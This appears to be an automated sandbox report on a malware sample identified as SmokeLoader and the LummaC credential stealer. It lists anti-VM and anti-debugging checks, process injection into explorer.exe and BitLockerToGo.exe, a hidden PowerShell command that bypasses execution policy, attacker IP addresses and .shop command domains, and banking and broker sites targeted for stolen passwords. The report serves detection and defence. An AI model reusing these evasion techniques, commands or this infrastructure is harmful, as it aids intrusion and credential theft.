Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW;s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: 7C81.exe Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2080080282.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6E8A.exe, 0000000B.00000002.4487639564.0000021FA3037000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4512237917.0000022A4D660000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F23329 CheckRemoteDebuggerPresent, 11_2_00007FF848F23329
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004F9D10 LdrInitializeThunk, 14_2_004F9D10
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0255092B mov eax, dword ptr fs:[00000030h] 0_2_0255092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02550D90 mov eax, dword ptr fs:[00000030h] 0_2_02550D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02713E37 push dword ptr fs:[00000030h] 0_2_02713E37
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E092B mov eax, dword ptr fs:[00000030h] 4_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E0D90 mov eax, dword ptr fs:[00000030h] 4_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_02643C47 push dword ptr fs:[00000030h] 4_2_02643C47
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E092B mov eax, dword ptr fs:[00000030h] 7_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E0D90 mov eax, dword ptr fs:[00000030h] 7_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_02666DDF push dword ptr fs:[00000030h] 7_2_02666DDF
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 3530.exe.2.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 125.7.253.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 177.222.41.236 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3000000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3270000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3290000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 protect: page execute and read and write Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory protected: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 30619D0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Thread created: unknown EIP: 32019D0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Thread created: unknown EIP: 88B19D0 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 3000000 value: 20 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 3001000 value: 48 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 8380030 value: 00 Jump to behavior
LummaC encrypted strings found
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: indexterityszcoxp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: lariatedzugspd.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: callosallsaospz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: outpointsozp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: liernessfornicsa.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: upknittsoappz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: shepherdlyopzc.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: unseaffarignsk.shop
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 3000000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 3001000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 8380030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 384008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership, 8_2_00007FF7A0A0F310
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2079913510.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2078086633.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Go Injector
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
